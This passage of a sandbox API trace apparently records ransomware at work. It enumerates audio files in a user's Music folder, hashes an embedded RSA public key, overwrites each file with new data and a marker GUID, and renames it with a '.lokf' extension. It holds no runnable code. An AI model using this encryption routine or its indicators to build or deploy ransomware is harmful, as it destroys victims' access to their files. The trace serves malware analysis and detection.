[0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e30 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e00 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e48 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e18 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e18 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e18 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e48 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e30 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e00 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85de8 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c893b8 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.450] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x179a4, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x179a4, lpOverlapped=0x0) returned 1 [0060.451] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.451] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x179a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.451] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.451] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.451] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.451] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.451] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.451] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.451] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.451] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.451] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.451] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.451] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.451] CloseHandle (hObject=0x5cc) returned 1 [0060.452] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0060.452] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.453] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.453] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\k9qaL9eZD8xHKw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\k9qal9ezd8xhkw.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\k9qaL9eZD8xHKw.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\k9qal9ezd8xhkw.m4a.lokf")) returned 1 [0060.453] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.453] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.453] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.454] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.454] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea0ef6a0, ftCreationTime.dwHighDateTime=0x1d4cea2, ftLastAccessTime.dwLowDateTime=0xe46fe140, ftLastAccessTime.dwHighDateTime=0x1d4d57e, ftLastWriteTime.dwLowDateTime=0xe46fe140, ftLastWriteTime.dwHighDateTime=0x1d4d57e, nFileSizeHigh=0x0, nFileSizeLow=0xace, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X3njm42.mp3", cAlternateFileName="")) returned 1 [0060.454] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.454] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.454] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.454] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\X3njm42.mp3") returned=".mp3" [0060.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\X3njm42.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\x3njm42.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.454] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=2766) returned 1 [0060.454] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.457] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xaa8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.457] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.457] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.458] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.458] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.458] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xace, lpOverlapped=0x0) returned 1 [0060.458] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.458] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.458] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.458] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.458] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8698) returned 1 [0060.458] CryptCreateHash (in: hProv=0x6b8698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.458] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.459] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.459] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.459] GetLastError () returned 0x0 [0060.459] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.459] CryptReleaseContext (hProv=0x6b8698, dwFlags=0x0) returned 1 [0060.459] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.459] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.459] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.459] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.459] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xad0) returned 0x9c778e8 [0060.459] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.459] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c893b8 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85de8 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89400 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e00 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e30 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e48 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.459] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.459] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e30 | out: hHeap=0x660000) returned 1 [0060.460] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e48 | out: hHeap=0x660000) returned 1 [0060.460] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.460] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.460] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.460] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.460] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.460] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e48 [0060.460] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xace, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.460] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.460] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.460] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.461] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.461] CloseHandle (hObject=0x5cc) returned 1 [0060.461] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\X3njm42.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\x3njm42.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\X3njm42.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\x3njm42.mp3.lokf")) returned 1 [0060.462] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.462] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.462] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.463] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.463] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5d27f00, ftCreationTime.dwHighDateTime=0x1d4cf37, ftLastAccessTime.dwLowDateTime=0xdf5db3a0, ftLastAccessTime.dwHighDateTime=0x1d4d388, ftLastWriteTime.dwLowDateTime=0xdf5db3a0, ftLastWriteTime.dwHighDateTime=0x1d4d388, nFileSizeHigh=0x0, nFileSizeLow=0xebfe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yLAA3zbV.wav", cAlternateFileName="")) returned 1 [0060.463] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\yLAA3zbV.wav") returned=".wav" [0060.463] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\yLAA3zbV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\ylaa3zbv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.463] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=60414) returned 1 [0060.463] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.465] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xebd8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.465] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.466] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xebfe, lpOverlapped=0x0) returned 1 [0060.467] lstrlenA (lpString="-----BEGIN PUBLIC 